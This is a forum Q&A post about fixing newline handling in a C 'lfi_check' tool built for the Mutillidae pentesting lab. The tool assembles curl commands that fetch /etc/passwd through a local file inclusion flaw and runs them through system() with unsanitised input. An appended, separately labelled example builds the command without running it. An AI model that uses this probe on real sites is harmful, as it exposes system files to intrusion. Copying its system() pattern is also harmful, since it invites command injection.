Freshnuts Freshnuts - 1 month ago 20
C Question

C Programming Element array into sprintf()

This is a pentesting laboratory environment called "Mutillidae".

This program grabs argv[1] and places it into the command "curl <argv[1]>",
then it grabs a line from the lfi_test file and places it into the second
%s in sprintf(). This program executes 100%; I am just having issues with the format ( | grep root). Instead, the entire source code is revealed, including the entire /etc/passwd file.

If I uncomment line #20:

char *passwd = "/etc/passwd";


and change line #27 to

sprintf(url,"/usr/bin/curl %s%s", argv[1], passwd);


I am able to get the formatted result I want.
If anyone can help me out, thank you in advance.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char * argv[])
{
  printf("\nlfi_check searches for system files on a vulnerable URL\n");
  printf("<><><><><><><><><><><><><><><><><><><><><><><><><><><><>\n\n");

  if (argc != 2)
  {
    printf("\nusage ./lfi_check http://target.php?page= \n");
  }
  else
  {
    char url[200];
    int i;
    FILE *fp;
    char line[200];
    char *root = "| grep root";
    // char *passwd = "/etc/passwd";

    fp = fopen("/home/freshnuts/pentest/lfi_rfi/lfi_test","r+");

    for (i=0; i <= 1; i++)
    {
      fgets(line,sizeof(line), fp);
      // line-1 is the argument this question is about
      sprintf(url,"/usr/bin/curl %s%s %s", argv[1], line-1, root);
      // printf("%s", line);
      system(url);
    }

  }
}

Answer

The reason line-1 wasn't working in...

sprintf(url,"/usr/bin/curl %s%s %s\n", argv[1], line-1, root);

was that line ("/etc/passwd\n") from the file was being cut by 1, and it didn't allow the char *root variable to be implemented into the string format.

The function strtok() breaks line into a series of tokens using a delimiter. I was then able to parse "/etc/passwd\n" to "/etc/passwd" BEFORE sprintf().

Thanks DUman & immibis

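#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char * argv[])
{
  printf("\nlfi_check searches for system files on a vulnerable URL\n");
  printf("<><><><><><><><><><><><><><><><><><><><><><><><><><><><>\n\n");

  if (argc != 2)
  {
    printf("\nusage ./lfi_check http://target.php?page= \n");
    return 1;
  }
  else
  {
    char url[4096];
    int i;
    FILE *fp;
    char line[200];
    char *root = " | grep root";

    /* the file is only read, so open it read-only */
    fp = fopen("/root/freshnuts/pentest/lfi_rfi/lfi_test","r");
    if (fp == NULL)
    {
      perror("fopen");
      return 1;
    }

    for (i=0; i <= 2; i++)
    {
      /* stop at end of file instead of reusing the previous line */
      if (fgets(line,sizeof(line), fp) == NULL)
        break;
      /* strtok() overwrites the trailing '\n' with '\0' */
      strtok(line, "\n");
      /* snprintf() cannot write past the end of url */
      snprintf(url, sizeof(url), "/usr/bin/curl %s%s %s\n", argv[1], line,root);
      system(url);
    }

    fclose(fp);
  }
  return 0;
}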
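An added example, not part of the original answer: the newline handling described above, isolated into two helpers so the edge cases can be checked. The names chomp and build_cmd and the sample lines are assumptions made for this illustration; the command is only built and printed, never run.

```c
#include <stdio.h>
#include <string.h>

/* Strip a trailing "\n" or "\r\n" in place; returns the new length.
 * Unlike strtok(line, "\n"), this also empties a line that is only "\n"
 * (strtok returns NULL there and leaves the buffer unchanged). */
size_t chomp(char *line)
{
    size_t n = strcspn(line, "\r\n");
    line[n] = '\0';
    return n;
}

/* Build "/usr/bin/curl <base><path> | grep root" into out.
 * Returns 0 on success, -1 if path is blank or the result would not fit. */
int build_cmd(char *out, size_t outsz, const char *base, char *path)
{
    if (chomp(path) == 0)
        return -1;                  /* blank line: nothing to request */
    int n = snprintf(out, outsz, "/usr/bin/curl %s%s | grep root", base, path);
    if (n < 0 || (size_t)n >= outsz)
        return -1;                  /* truncated: never run a partial command */
    return 0;
}

int main(void)
{
    /* Constructed sample lines, shaped as fgets() would return them. */
    char lines[][32] = { "/etc/passwd\n", "/etc/hosts\r\n", "\n", "/etc/group" };
    const char *base = "http://target.php?page=";  /* placeholder from the usage text */
    char cmd[256];

    for (size_t i = 0; i < sizeof lines / sizeof lines[0]; i++) {
        if (build_cmd(cmd, sizeof cmd, base, lines[i]) == 0)
            printf("%s\n", cmd);    /* printed only, not passed to system() */
        else
            printf("skipped line %zu\n", i);
    }
    return 0;
}
```

A newline left inside the string ends the shell command early, so the pipe lands on a line of its own and the curl output is never filtered.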